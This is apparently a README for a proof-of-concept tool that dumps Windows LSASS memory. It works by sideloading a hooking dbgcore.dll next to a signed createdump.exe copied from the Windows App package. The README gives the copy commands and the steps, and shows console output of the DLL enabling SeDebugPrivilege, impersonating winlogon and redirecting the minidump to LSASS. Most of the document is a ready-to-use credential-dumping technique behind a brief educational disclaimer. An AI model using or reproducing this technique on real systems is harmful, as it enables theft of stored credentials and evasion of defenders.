This project demonstrates how to dump the LSASS process using the createdump.exe tool, a Microsoft signed executable, from the Windows App, leveraging a custom hook to enable process access to LSASS.
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')
Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc
SignerCertificate Status StatusMessage Path
----------------- ------ ------------- ----
C2048FB509F1C37A8C3E9EC6648118458AA01780 Valid Signature verified. createdump.exe
- Copy createdump from WindowsApp folder to a folder of choice (
copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .) - place
dbgcore.dllfrom this repo in the same folder - execute createdump (optionally provide parameters)
Output should be something like this:
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump
Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
ProcessId: 35828
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
ProcessId: 1512
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.
This project is intended for educational purposes only. Misuse of this tool could violate privacy and security policies.